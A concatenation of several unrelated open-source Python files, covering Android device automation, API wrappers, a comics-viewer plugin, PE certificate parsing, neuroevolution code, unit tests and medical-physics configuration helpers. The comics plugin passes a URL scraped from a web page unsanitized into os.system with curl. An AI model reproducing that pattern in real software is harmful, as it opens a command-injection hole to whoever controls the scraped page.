cmd=DOUBLE_CLICK_POWER_EVENT_TEMPLATE.format(input_event=input_event)))
def double_click(self, x, y):
"""Performs double tap.
Note: This action only works on rooted devices.
Args:
x: The x coordinate of a point to perform double click.
y: The y coordinate of a point to perform double click.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
get_touch_event_cmd = ("getevent -pl 2>&1 | sed -n "
"'/^add/{h}/ABS_MT_TOUCH/{x;s/[^/]*//p}'")
input_event = self.android_device_driver.adb.exec_adb_cmd(
"shell '{cmd}'".format(cmd=get_touch_event_cmd)).communicate()[0]
self.android_device_driver.adb.exec_adb_cmd("shell '{cmd}'".format(
cmd=DOUBLE_TAP_EVENT_TEMPLATE.format(
input_event=input_event, x=x, y=y)))
def adb(self, command):
"""Performs an adb command.
Args:
command: The adb command
"""
self.android_device_driver.adb.raw_cmd(command)
def logcat(self, limit=1000):
"""Performs adb logcat command.
Note this can be very slow and only provides adb logcat command output.
If you need full logcat functionality, run the adb commands yourself.
Args:
limit: The limit of output array.
Returns:
List of logcat.
"""
result, counter = [], 0
output = self.android_device_driver.adb.raw_cmd("logcat")
for stdout_line in iter(output.stdout.readline, ""):
counter += 1
result.append(stdout_line)
if counter == limit:
break
output.stdout.close()
return result
def find_element(self, attrib_key, attrib_value, match_option=None):
"""Find element by attribute.
Args:
attrib_key: attribute name the value should match.
attrib_value: attribute value to match.
match_option: option for advanced matching.
Returns:
An Uiobject match the condition. None if no UiObject matches the
condition.
"""
selector = UiSelector()
selector.attributes(attrib_key, attrib_value, match_option)
return UiObject(selector, self.android_device_driver) if UiObject(
selector, self.android_device_driver).verify_exist() else None
def find_element_by_selector(self, selector):
"""Find element by selector.
Args:
selector: target selector.
Returns:
An Uiobject match the selector. None if no UiObject matches the selector.
"""
return UiObject(selector, self.android_device_driver) if UiObject(
selector, self.android_device_driver).verify_exist() else None
def has_element(self, attrib_key, attrib_value, match_option=None):
"""Check whether element is on the screen.
Args:
attrib_key: attribute name the value should match.
attrib_value: attribute value to match.
match_option: option for advanced matching.
Returns:
Whether current screen contains the target element.
"""
selector = UiSelector()
selector.attributes(attrib_key, attrib_value, match_option)
return UiObject(selector, self.android_device_driver).verify_exist()
def has_text(self, text, match_option=None):
"""Function to invoke UiObject by description.
Args:
text: key for which the value should match.
match_option: option for advanced matching.
Returns:
Whether current screen contains the target text.
"""
selector_text = UiSelector().attributes("text", text, match_option)
selector_content_desc = UiSelector().attributes("content-desc", text,
match_option)
return UiObject(
selector_text, self.android_device_driver).verify_exist() or UiObject(
selector_content_desc, self.android_device_driver).verify_exist()
def sleep(self, sleep_time):
"""Invokes sleep function.
Args:
sleep_time: time for sleep, in ms.
Returns:
None.
"""
time.sleep(sleep_time)
|
src/riotwatcher/_apis/league_of_legends/ClashApiV1.py | TheBoringBakery/Riot-Watcher | 489 | 12653306 | <filename>src/riotwatcher/_apis/league_of_legends/ClashApiV1.py<gh_stars>100-1000
from .. import BaseApi, NamedEndpoint
from .urls import ClashApiV1Urls
class ClashApiV1(NamedEndpoint):
"""
This class wraps the Clash-v1 endpoint calls provided by the Riot API.
See https://developer.riotgames.com/apis#clash-v1 for more detailed information
"""
def __init__(self, base_api: BaseApi):
"""
Initialize a new ClashApiV1 which uses the provided base_api
:param BaseApi base_api: the root API object to use for making all requests.
"""
super().__init__(base_api, self.__class__.__name__)
def by_summoner(self, region: str, summoner_id: str):
"""
This endpoint returns a list of active Clash players for a given summoner ID.
If a summoner registers for multiple tournaments at the same time (e.g., Saturday and
Sunday) then both registrations would appear in this list.
:param string region: The region to execute this request on.
:param string summoner_id: The summoner ID.
:returns: List[PlayerDTO]: represents the summoner's info for the current clash.
"""
return self._request_endpoint(
self.by_summoner.__name__,
region,
ClashApiV1Urls.by_summoner,
summoner_id=summoner_id,
)
def by_team(self, region: str, team_id: str):
"""
Get team by ID.
:param string region: The region to execute this request on
:param string team_id: Team ID
:returns: TeamDTO: represents a clash team
"""
return self._request_endpoint(
self.by_team.__name__, region, ClashApiV1Urls.by_team, team_id=team_id,
)
def tournaments(self, region: str):
"""
Returns a list of active and upcoming tournaments.
:param string region: The region to execute this request on
:returns: List[TournamentDTO]: represents all of the current tournaments active
"""
return self._request_endpoint(
self.tournaments.__name__, region, ClashApiV1Urls.tournaments,
)
def tournament_by_team(self, region: str, team_id: str):
"""
Get tournament by team ID.
:param string region: The region to execute this request on
:param string team_id: Team ID
:returns: TournamentDTO: represents a clash tournament
"""
return self._request_endpoint(
self.tournament_by_team.__name__,
region,
ClashApiV1Urls.tournament_by_team,
team_id=team_id,
)
def by_tournament(self, region: str, tournament_id: str):
"""
Get tournament by ID.
:param string region: The region to execute this request on
:param string tournament_id: Tournament ID
:returns: TournamentDTO: represents a clash tournament
"""
return self._request_endpoint(
self.by_tournament.__name__,
region,
ClashApiV1Urls.by_tournament,
tournament_id=tournament_id,
)
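# Usage sketch (hedged): assumes the installed riotwatcher version exposes this
# endpoint group as `clash` on LolWatcher -- verify against your version.
#
#   from riotwatcher import LolWatcher
#   watcher = LolWatcher("RGAPI-...")              # placeholder API key
#   tournaments = watcher.clash.tournaments("na1")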
|
Sources/Workflows/Comics/plugins/ctrl_alt_del/main.py | yagosys/AlfredWorkflow.com | 2,177 | 12653325 | def enabled():
return True
def title():
return "Ctrl+Alt+Del"
def subtitle():
return "View the latest Ctrl+Alt+Del strip"
def run():
import os
import re
content = os.popen("""curl -s http://www.cad-comic.com/cad/""").read().rstrip()
strip = re.match(r'.*?src="(http://v.cdn.cad-comic.com/comics/cad.*?)"' , content, re.IGNORECASE|re.S).groups(0)[0]
os.system('curl -s ' + strip + ' --O strip.png')
os.system('qlmanage -p strip.png')
|
office365/onedrive/internal/paths/resource_path_url.py | vgrem/Office365-REST-Python-Client | 544 | 12653342 | from office365.runtime.client_path import ClientPath
class ResourcePathUrl(ClientPath):
"""Resource path for OneDrive path-based addressing"""
def __init__(self, rel_url, parent):
"""
:param str rel_url: File or Folder relative url
:type parent: office365.runtime.client_path.ClientPath
"""
super(ResourcePathUrl, self).__init__(parent)
self._url = rel_url
self._nested = False
@property
def segments(self):
delimiter = "/" if self._nested else ":/"
if isinstance(self.parent, ResourcePathUrl):
self.parent._nested = True
return [self._url, delimiter]
else:
return [self.delimiter, self._url, delimiter]
@property
def delimiter(self):
return ":/"
@property
def name(self):
return self._url
|
cumulusci/tasks/preflight/settings.py | davisagli/CumulusCI | 163 | 12653351 | <filename>cumulusci/tasks/preflight/settings.py
from simple_salesforce.exceptions import SalesforceMalformedRequest
from cumulusci.core.tasks import BaseSalesforceTask
from cumulusci.core.utils import process_bool_arg
from cumulusci.tasks.salesforce.BaseSalesforceApiTask import BaseSalesforceApiTask
class CheckMyDomainActive(BaseSalesforceTask):
def _run_task(self):
self.return_values = (
".my." in self.org_config.instance_url
or ".cloudforce.com" in self.org_config.instance_url
)
self.logger.info(
f"Completed My Domain preflight check with result {self.return_values}"
)
class CheckSettingsValue(BaseSalesforceApiTask):
task_options = {
"settings_type": {
"description": "The API name of the Settings entity to be checked, such as ChatterSettings.",
"required": True,
},
"settings_field": {
"description": "The API name of the field on the Settings entity to check.",
"required": True,
},
"value": {"description": "The value to check for", "required": True},
"treat_missing_as_failure": {
"description": "If True, treat a missing Settings entity as a preflight failure, instead of raising an exception. Defaults to False.",
"required": False,
},
}
def _run_task(self):
field = self.options["settings_field"]
entity = self.options["settings_type"]
try:
results = self.tooling.query(f"SELECT {field} FROM {entity}")["records"]
except SalesforceMalformedRequest as e:
self.logger.error(
f"The settings value {entity}.{field} could not be queried: {e}"
)
self.return_values = False
if not process_bool_arg(
self.options.get("treat_missing_as_failure", False)
):
raise e
return
if not results:
self.logger.info(
"Located no Settings records. Returning negative preflight result."
)
self.return_values = False
return
value = results[0].get(self.options["settings_field"])
# Type-sensitive compare.
if type(value) is bool:
comparand = process_bool_arg(self.options["value"])
elif type(value) is float:
comparand = float(self.options["value"])
elif type(value) is int:
comparand = int(self.options["value"])
else:
comparand = self.options["value"]
self.return_values = value == comparand
self.logger.info(
f"Completed Settings preflight check with result {self.return_values}"
)
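# Sketch of wiring this check into cumulusci.yml (hedged -- the task name and the
# ChatterSettings field are illustrative; check the CumulusCI docs for the schema):
#
#   tasks:
#       check_chatter_enabled:
#           class_path: cumulusci.tasks.preflight.settings.CheckSettingsValue
#           options:
#               settings_type: ChatterSettings
#               settings_field: IsChatterEnabled
#               value: True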
|
fsf-server/modules/META_PE_SIGNATURE.py | akniffe1/fsf | 259 | 12653364 | <filename>fsf-server/modules/META_PE_SIGNATURE.py
#!/usr/bin/env python
#
# Author: <NAME>
# Description: Get metadata on the signature used to sign a PE file
# Date: 11/17/2015
#
# Good resources:
# * https://www.cs.auckland.ac.nz/~pgut001/pubs/authenticode.txt
# * http://erny-rev.blogspot.com/2013/10/parsing-x509v3-certificates-and-pkcs7.html
# * http://pyasn1.sourceforge.net/
# * https://msdn.microsoft.com/en-us/windows/hardware/gg463180.aspx
'''
Copyright 2015 Emerson Electric Co.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import sys
import pefile
import struct
from datetime import datetime
from pyasn1.codec.der.decoder import decode
from pyasn1_modules import rfc2315
# Reference: https://msdn.microsoft.com/en-us/library/ff635603.aspx
def hash_alg_oid_mapping():
db = {}
db['1.2.840.113549.1.1.5'] = 'sha1RSA'
db['1.2.840.113549.1.1.4'] = 'md5RSA'
db['1.2.840.10040.4.3'] = 'sha1DSA'
db['1.3.14.3.2.29'] = 'sha1RSA'
db['1.3.14.3.2.15'] = 'shaRSA'
db['1.3.14.3.2.3'] = 'md5RSA'
db['1.2.840.113549.1.1.2'] = 'md2RSA'
db['1.2.840.113549.1.1.3'] = 'md4RSA'
db['1.3.14.3.2.2'] = 'md4RSA'
db['1.3.14.3.2.4'] = 'md4RSA'
db['1.3.14.7.2.3.1'] = 'md2RSA'
db['1.3.14.3.2.13'] = 'sha1DSA'
db['1.3.14.3.2.27'] = 'dsaSHA1'
db['2.16.840.1.101.2.1.1.19'] = 'mosaicUpdatedSig'
db['1.3.14.3.2.26'] = 'sha1NoSign'
db['1.2.840.113549.2.5'] = 'md5NoSign'
db['2.16.840.1.101.3.4.2.1'] = 'sha256NoSign'
db['2.16.840.1.101.3.4.2.2'] = 'sha384NoSign'
db['2.16.840.1.101.3.4.2.3'] = 'sha512NoSign'
db['1.2.840.113549.1.1.11'] = 'sha256RSA'
db['1.2.840.113549.1.1.12'] = 'sha384RSA'
db['1.2.840.113549.1.1.13'] = 'sha512RSA'
db['1.2.840.113549.1.1.10'] = 'RSASSA-PSS'
db['1.2.840.10045.4.1'] = 'sha1ECDSA'
db['1.2.840.10045.4.3.2'] = 'sha256ECDSA'
db['1.2.840.10045.4.3.3'] = 'sha384ECDSA'
db['1.2.840.10045.4.3.4'] = 'sha512ECDSA'
db['1.2.840.10045.4.3'] = 'specifiedECDSA'
return db
# Reference: https://msdn.microsoft.com/en-us/library/windows/desktop/aa386991(v=vs.85).aspx
def rdn_oid_mapping():
db = {}
db['2.5.4.3'] = 'CN'
db['2.5.4.5'] = 'DeviceSerialNumber'
db['2.5.4.6'] = 'C'
db['2.5.4.7'] = 'L'
db['2.5.4.8'] = 'ST'
db['2.5.4.10'] = 'O'
db['2.5.4.11'] = 'OU'
db['1.2.840.113549.1.9.1'] = 'E'
return db
def get_cert_info(signed_data):
PARENT_CERT_INFO = {}
rdn_mapping = rdn_oid_mapping()
hash_mapping = hash_alg_oid_mapping()
cert_count = 0
for c in signed_data['certificates']:
CERT_INFO = {}
cer = c['certificate']['tbsCertificate']
CERT_INFO['Version'] = cer['version'].prettyPrint()[1:-1] # the [1:-1] is a fun way to get rid of double quotes
CERT_INFO['Algorithm'] = hash_mapping[cer['signature']['algorithm'].prettyPrint()]
# Had to get creative here with the formatting.
serial = '%.02x' % int(cer['serialNumber'].prettyPrint())
# Append a zero to the front if we have an odd number of hex digits
serial = '0' + serial if len(serial) % 2 != 0 else serial
# Finally, apply our colon in between the hex bytes
serial = ':'.join(serial[i:i+2] for i in range(0, len(serial), 2))
CERT_INFO['Serial'] = serial
CERT_INFO['Validity'] = { 'Not Before' : datetime.strptime(str(cer['validity']['notBefore']['utcTime']), '%y%m%d%H%M%SZ').strftime("%Y-%m-%d %H:%M:%S UTC"),
'Not After' : datetime.strptime(str(cer['validity']['notAfter']['utcTime']), '%y%m%d%H%M%SZ').strftime("%Y-%m-%d %H:%M:%S UTC") }
subject = cer['subject']
issuer = cer['issuer']
rdnsequence = subject[0]
CERT_INFO['Subject'] = []
for rdn in rdnsequence:
oid, value = rdn[0]
if oid.prettyPrint() in rdn_mapping:
CERT_INFO['Subject'].append('%s=%s' % (rdn_mapping[oid.prettyPrint()], str(value[2:])))
rdnsequence = issuer[0]
CERT_INFO['Issuer'] = []
for rdn in rdnsequence:
oid, value = rdn[0]
if oid.prettyPrint() in rdn_mapping:
CERT_INFO['Issuer'].append('%s=%s' % (rdn_mapping[oid.prettyPrint()], str(value[2:])))
PARENT_CERT_INFO['Cert_%s' % cert_count] = CERT_INFO
cert_count += 1
return PARENT_CERT_INFO
def META_PE_SIGNATURE(s, buff):
sig_buff = []
pe = pefile.PE(data=buff)
address = pe.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].VirtualAddress
size = pe.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].Size
# Eight bytes in due to the struct spec
# typedef struct _WIN_CERTIFICATE
# {
# DWORD dwLength;
# WORD wRevision;
# WORD wCertificateType;
# BYTE bCertificate[ANYSIZE_ARRAY];
# } WIN_CERTIFICATE, *LPWIN_CERTIFICATE;
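    # dwLength (4 bytes) + wRevision (2 bytes) + wCertificateType (2 bytes) = the 8 bytes skipped below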
sig_buff = buff[address + 8 : address + 8 + size]
# Remove sequence and objid structures, 19 bytes
signed_data, rest = decode(sig_buff[19:], asn1Spec=rfc2315.SignedData())
return get_cert_info(signed_data)
if __name__ == '__main__':
print META_PE_SIGNATURE(None, sys.stdin.read())
|
tfne/populations/codeepneat/codeepneat_population.py | githealthy18/Tensorflow-Neuroevolution | 121 | 12653374 | import statistics
from ..base_population import BasePopulation
class CoDeepNEATPopulation(BasePopulation):
"""
Population class of the CoDeepNEAT algorithm that holds all relevant population information in a single place to
ease summary, serialization and deserialization.
"""
def __init__(self, initial_state=None):
"""
Initializes all variables of a CoDeepNEAT population either to None/default values or to an initial state if
such is supplied (usually when deserializing population)
@param initial_state: dict object holding keys and values to all population variables
"""
# Declare internal variables of the CoDeepNEAT population
self.generation_counter = None
self.best_genome = None
self.best_fitness = None
# Declare and initialize internal variables concerning the module population of the CoDeepNEAT algorithm
self.modules = dict()
self.mod_species = dict()
self.mod_species_repr = dict()
self.mod_species_fitness_history = dict()
self.mod_species_counter = 0
# Declare and initialize internal variables concerning the blueprint population of the CoDeepNEAT algorithm
self.blueprints = dict()
self.bp_species = dict()
self.bp_species_repr = dict()
self.bp_species_fitness_history = dict()
self.bp_species_counter = 0
# If an initial state is supplied, then the population was deserialized. Recreate this initial state.
if initial_state is not None:
self.generation_counter = initial_state['generation_counter']
self.best_genome = initial_state['best_genome']
self.best_fitness = initial_state['best_fitness']
self.modules = initial_state['modules']
self.mod_species = initial_state['mod_species']
self.mod_species_repr = initial_state['mod_species_repr']
self.mod_species_fitness_history = initial_state['mod_species_fitness_history']
self.mod_species_counter = initial_state['mod_species_counter']
self.blueprints = initial_state['blueprints']
self.bp_species = initial_state['bp_species']
self.bp_species_repr = initial_state['bp_species_repr']
self.bp_species_fitness_history = initial_state['bp_species_fitness_history']
self.bp_species_counter = initial_state['bp_species_counter']
def summarize_population(self):
"""
Prints the current state of all CoDeepNEAT population variables to stdout in a formatted and clear manner
"""
# Determine average fitness of all blueprints
bp_fitness_list = [self.blueprints[bp_id].get_fitness() for bp_id in self.blueprints]
blueprints_avg_fitness = round(statistics.mean(bp_fitness_list), 4)
# Determine best id of each blueprint species
bp_species_best_id = dict()
for spec_id, spec_bp_ids in self.bp_species.items():
spec_bp_ids_sorted = sorted(spec_bp_ids, key=lambda x: self.blueprints[x].get_fitness(), reverse=True)
bp_species_best_id[spec_id] = spec_bp_ids_sorted[0]
# Determine average fitness of all modules
mod_fitness_list = [self.modules[mod_id].get_fitness() for mod_id in self.modules]
modules_avg_fitness = round(statistics.mean(mod_fitness_list), 4)
# Determine best id of each module species
mod_species_best_id = dict()
for spec_id, spec_mod_ids in self.mod_species.items():
spec_mod_ids_sorted = sorted(spec_mod_ids, key=lambda x: self.modules[x].get_fitness(), reverse=True)
mod_species_best_id[spec_id] = spec_mod_ids_sorted[0]
# Print summary header
print("\n\n\n\033[1m{} Population Summary {}\n\n"
"Generation: {:>4} || Best Genome Fitness: {:>8} || Avg Blueprint Fitness: {:>8} || "
"Avg Module Fitness: {:>8}\033[0m\n"
"Best Genome: {}\n"
.format('#' * 60,
'#' * 60,
self.generation_counter,
self.best_fitness,
blueprints_avg_fitness,
modules_avg_fitness,
self.best_genome))
# Print summary of blueprint species
print("\033[1mBlueprint Species || Blueprint Species Avg Fitness || Blueprint Species Size\033[0m")
        for spec_id, spec_fitness_history in self.bp_species_fitness_history.items():
print("{:>6} || {:>8} || {:>8}"
.format(spec_id,
                          spec_fitness_history[self.generation_counter],
len(self.bp_species[spec_id])))
print(f"Best BP of Species {spec_id} || {self.blueprints[bp_species_best_id[spec_id]]}")
# Print summary of module species
print("\n\033[1mModule Species || Module Species Avg Fitness || Module Species Size\033[0m")
        for spec_id, spec_fitness_history in self.mod_species_fitness_history.items():
print("{:>6} || {:>8} || {:>8}"
.format(spec_id,
                          spec_fitness_history[self.generation_counter],
len(self.mod_species[spec_id])))
print(f"Best Mod of Species {spec_id} || {self.modules[mod_species_best_id[spec_id]]}")
# Print summary footer
print("\n\033[1m" + '#' * 142 + "\033[0m\n")
def serialize(self) -> dict:
"""
Serializes all CoDeepNEAT population variables to a json compatible dictionary and returns it
@return: serialized population variables as a json compatible dict
"""
# Serialize all modules
serialized_modules = dict()
for mod_id, module in self.modules.items():
serialized_modules[mod_id] = module.serialize()
# Serialize all blueprints
serialized_blueprints = dict()
for bp_id, blueprint in self.blueprints.items():
serialized_blueprints[bp_id] = blueprint.serialize()
# Use serialized module and blueprint population and extend it by population internal evolution information
serialized_population = {
'population_type': 'CoDeepNEAT',
'generation_counter': self.generation_counter,
'modules': serialized_modules,
'mod_species': self.mod_species,
'mod_species_repr': self.mod_species_repr if self.mod_species_repr else None,
'mod_species_fitness_history': self.mod_species_fitness_history,
'mod_species_counter': self.mod_species_counter,
'blueprints': serialized_blueprints,
'bp_species': self.bp_species,
'bp_species_repr': self.bp_species_repr if self.bp_species_repr else None,
'bp_species_fitness_history': self.bp_species_fitness_history,
'bp_species_counter': self.bp_species_counter,
'best_genome': self.best_genome.serialize(),
'best_fitness': self.best_fitness
}
return serialized_population
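# Rough usage sketch (assumed workflow, not part of the original module):
#   population = CoDeepNEATPopulation()
#   ...evolution loop fills modules/blueprints and sets best_genome/best_fitness...
#   state = population.serialize()
#   restored = CoDeepNEATPopulation(initial_state=previously_deserialized_state)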
|
mmt/loss/__init__.py | ChienHsuan/MMT | 425 | 12653381 | from __future__ import absolute_import
from .triplet import TripletLoss, SoftTripletLoss
from .crossentropy import CrossEntropyLabelSmooth, SoftEntropy
__all__ = [
'TripletLoss',
'CrossEntropyLabelSmooth',
'SoftTripletLoss',
'SoftEntropy'
]
|
tests/unit/pytorch/distributions/test_deterministic.py | chiragnagpal/probflow | 134 | 12653405 | import numpy as np
import pytest
import torch
from probflow.distributions import Deterministic
from probflow.utils.torch_distributions import get_TorchDeterministic
tod = torch.distributions
def is_close(a, b, tol=1e-3):
return np.abs(a - b) < tol
def test_TorchDeterministic():
"""Tests the TorchDeterministic distribution"""
TorchDeterministic = get_TorchDeterministic()
dist = TorchDeterministic(loc=torch.tensor([2.0]), validate_args=True)
assert is_close(dist.mean.numpy()[0], 2.0)
assert is_close(dist.stddev, 0.0)
assert is_close(dist.variance, 0.0)
dist.expand([5, 2])
dist.rsample()
dist.log_prob(torch.tensor([1.0]))
dist.cdf(torch.tensor([1.0]))
dist.icdf(torch.tensor([1.0]))
dist.entropy()
def test_Deterministic():
"""Tests Deterministic distribution"""
# Create the distribution
dist = Deterministic()
# Check default params
assert dist.loc == 0
# Call should return backend obj
assert isinstance(dist(), tod.distribution.Distribution)
# Test methods
assert dist.prob(torch.zeros([1])).numpy() == 1.0
assert dist.prob(torch.ones([1])).numpy() == 0.0
assert dist.log_prob(torch.zeros([1])).numpy() == 0.0
assert dist.log_prob(torch.ones([1])).numpy() == -np.inf
assert dist.mean().numpy() == 0.0
# Test sampling
samples = dist.sample()
assert isinstance(samples, torch.Tensor)
assert samples.ndim == 0
samples = dist.sample(10)
assert isinstance(samples, torch.Tensor)
assert samples.ndim == 1
assert samples.shape[0] == 10
samples = dist.sample(torch.tensor([10]))
assert isinstance(samples, torch.Tensor)
assert samples.ndim == 1
assert samples.shape[0] == 10
# Should be able to set params
dist = Deterministic(loc=2)
assert dist.loc == 2
assert dist.prob(2 * torch.ones([1])).numpy() == 1.0
assert dist.prob(torch.ones([1])).numpy() == 0.0
# But only with Tensor-like objs
with pytest.raises(TypeError):
dist = Deterministic(loc="lalala")
|
tests/test_bitmap.py | sylencecc/spamscope | 252 | 12653407 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright 2016 <NAME> (https://www.linkedin.com/in/fmantuano/)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import unittest
from context import bitmap
PhishingBitMap = bitmap.PhishingBitMap
logging.getLogger().addHandler(logging.NullHandler())
class ValidBitMap(bitmap.BitMap):
_map_name = "valid_bitmap"
def define_bitmap(self):
self._bitmap = {
"property_0": 0,
"property_1": 1,
"property_2": 2,
}
class InValidBitMap(bitmap.BitMap):
_map_name = "invalid_bitmap"
def define_bitmap(self):
self._bitmap = {
"property_0": 0,
# "property_1": 1,
"property_2": 2,
}
class MissingBitMap(bitmap.BitMap):
_map_name = "missing_bitmap"
def define_bitmap(self):
self._notbitmap = {
"property_0": 0,
"property_1": 1,
"property_2": 2,
}
class TestBitMap(unittest.TestCase):
bm = ValidBitMap()
def test_valid_map(self):
self.assertRaises(
bitmap.BitMapNotValid,
InValidBitMap,
)
def test_missing_map(self):
self.assertRaises(
bitmap.BitMapNotDefined,
MissingBitMap,
)
def test_reset_score(self):
self.assertEqual(self.bm.score, 0)
self.bm.reset_score()
self.assertEqual(self.bm.score, 0)
        self.bm.score = 0
self.assertEqual(self.bm.score, 0)
def test_score(self):
with self.assertRaises(bitmap.ScoreOutOfRange):
self.bm.score = 10
self.assertEqual(self.bm.score, 0)
self.bm.score = 4
self.assertEqual(self.bm.score, 4)
def test_map_name(self):
self.assertEqual(self.bm.map_name, "valid_bitmap")
self.bm.map_name = "new_bitmap"
self.assertEqual(self.bm.map_name, "new_bitmap")
def test_set_unset(self):
self.bm.reset_score()
self.bm.set_property_score('property_2')
self.assertEqual(self.bm.score, 4)
self.bm.unset_property_score('property_2')
self.assertEqual(self.bm.score, 0)
self.bm.set_property_score('property_0')
self.bm.set_property_score('property_1')
self.bm.set_property_score('property_2')
self.assertEqual(self.bm.score, 7)
self.bm.unset_property_score('property_0')
self.assertEqual(self.bm.score, 6)
self.bm.unset_property_score('property_1')
self.assertEqual(self.bm.score, 4)
self.bm.unset_property_score('property_2')
self.assertEqual(self.bm.score, 0)
self.bm.set_property_score(
'property_0',
'property_1',
'property_2',
)
self.assertEqual(self.bm.score, 7)
self.bm.unset_property_score(
'property_0',
'property_1',
'property_2',
)
self.assertEqual(self.bm.score, 0)
with self.assertRaises(bitmap.PropertyDoesNotExists):
self.bm.set_property_score('property_fake')
with self.assertRaises(bitmap.PropertyDoesNotExists):
self.bm.unset_property_score('property_fake')
def test_score_properties(self):
self.bm.reset_score()
self.assertEqual(self.bm.score_properties, [])
self.assertIsInstance(self.bm.score_properties, list)
self.bm.score = 7
properties = ['property_2', 'property_1', 'property_0']
self.assertEqual(self.bm.score_properties, properties)
def test_calculate_score(self):
self.bm.reset_score()
score = self.bm.calculate_score(
# 'property_0',
'property_1',
'property_2',
)
self.assertEqual(score, 6)
with self.assertRaises(bitmap.PropertyDoesNotExists):
self.bm.calculate_score(
'property_fake',
)
def test_score_sum(self):
self.bm.reset_score()
score = self.bm.get_score_sum(2, 1, 0)
self.assertEqual(score, 7)
def test_phishing_bitmap(self):
phishing_bitmap = PhishingBitMap()
max_score = phishing_bitmap.calculate_score(
"mail_body",
"urls_body",
"text_attachments",
"urls_attachments",
"filename_attachments",
"mail_from",
"mail_subject",
)
self.assertEqual(max_score, 127)
if __name__ == '__main__':
unittest.main(verbosity=2)
|
tests/test_blending_range.py | andrewvaliente/pytoshop | 106 | 12653412 |
# -*- coding: utf-8 -*-
import pytest
from pytoshop import blending_range
def _test_default_blending_range(b):
assert b.black0 == 0
assert b.black1 == 0
assert b.white0 == 0
assert b.white1 == 0
def test_default_blending_range():
b = blending_range.BlendingRange()
_test_default_blending_range(b)
b.black0 = 1
b.black1 = 2
b.white0 = 3
b.white1 = 4
assert b.black0 == 1
assert b.black1 == 2
assert b.white0 == 3
assert b.white1 == 4
def test_default_blending_range_pair():
pair = blending_range.BlendingRangePair()
_test_default_blending_range(pair.src)
_test_default_blending_range(pair.dst)
with pytest.raises(TypeError):
pair.src = None
with pytest.raises(TypeError):
pair.dst = None
pair.src = pair.dst
|
api/base/graphql.py | RyanNoelk/OpenEats | 113 | 12653413 | #!/usr/bin/env python
# encoding: utf-8
from __future__ import unicode_literals
from django.conf import settings
from graphene import ObjectType, Field, Schema
from graphene_django.debug import DjangoDebug
from v1.recipe.schema import RecipeQuery, RecipeMutations
from v1.recipe_groups.schema import RecipeGroupQuery, RecipeGroupMutations
from v1.ingredient.schema import IngredientQuery, IngredientMutations
from v1.list.schema import ListQuery, ListMutations
# GraphQL implementation
# TODO: not all of these queries are 100% ready.
# There is a bare-bones structure ready to go.
# When the frontend gets refactored,
# we will switch everything over to GraphQL.
class Query(
RecipeQuery,
RecipeGroupQuery,
IngredientQuery,
ListQuery,
ObjectType,
):
if settings.DEBUG:
debug = Field(DjangoDebug, name='__debug')
class Mutation(
# RecipeMutations,
# RecipeGroupMutations,
# IngredientMutations,
ListMutations,
ObjectType
):
if settings.DEBUG:
debug = Field(DjangoDebug, name='__debug')
schema = Schema(query=Query, mutation=Mutation)
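# Illustrative only: a graphene schema can be executed directly, e.g.
#   result = schema.execute('{ __typename }')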
|
lib/pymedphys/_streamlit/apps/metersetmap/_config.py | ethanio12345/pymedphys | 207 | 12653427 |
# Copyright (C) 2020-2021 Cancer Care Associates
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pathlib
from pymedphys._imports import streamlit as st
import pymedphys
from pymedphys._streamlit.utilities import config as st_config
HERE = pathlib.Path(__file__).parent
def config_on_disk():
return None
def config_in_current_directory():
return HERE
@st.cache
def download_demo_files():
cwd = pathlib.Path.cwd()
pymedphys.zip_data_paths("metersetmap-gui-e2e-data.zip", extract_directory=cwd)
return cwd.joinpath("pymedphys-gui-demo")
CONFIG_OPTIONS = {
"Config on Disk": config_on_disk,
"File Upload/Download Only": config_in_current_directory,
"Demo Data": download_demo_files,
}
def get_config(config_mode):
path = CONFIG_OPTIONS[config_mode]()
return st_config.get_config(path)
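# e.g. get_config("Demo Data") downloads the demo archive first, then loads the config found there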
@st.cache
def get_dicom_export_locations(config):
site_directories = st_config.get_site_directories(config)
dicom_export_locations = {
site: directories["monaco"].parent.parent.joinpath("DCMXprtFile")
for site, directories in site_directories.items()
}
return dicom_export_locations
@st.cache
def get_icom_live_stream_directories(config):
icom_live_stream_directories = {}
for site in config["site"]:
icom_live_base_directory = pathlib.Path(site["export-directories"]["icom_live"])
for linac in site["linac"]:
icom_live_stream_directories[linac["name"]] = str(
icom_live_base_directory.joinpath(linac["ip"])
)
return icom_live_stream_directories
@st.cache
def get_machine_centre_map(config):
machine_centre_map = {}
for site in config["site"]:
for linac in site["linac"]:
machine_centre_map[linac["name"]] = site["name"]
return machine_centre_map
def _get_alias_with_fallback(site_mosaiq_config):
try:
return site_mosaiq_config["alias"]
except KeyError:
pass
try:
port = site_mosaiq_config["port"]
except KeyError:
port = 1433
return f"{site_mosaiq_config['hostname']}:{port}"
@st.cache
def get_mosaiq_details(config):
mosaiq_details = {
site["name"]: {
"timezone": site["mosaiq"]["timezone"],
"server": {
"hostname": site["mosaiq"]["hostname"],
"port": site["mosaiq"]["port"],
"alias": _get_alias_with_fallback(site["mosaiq"]),
},
}
for site in config["site"]
}
return mosaiq_details
@st.cache
def get_default_icom_directories(config):
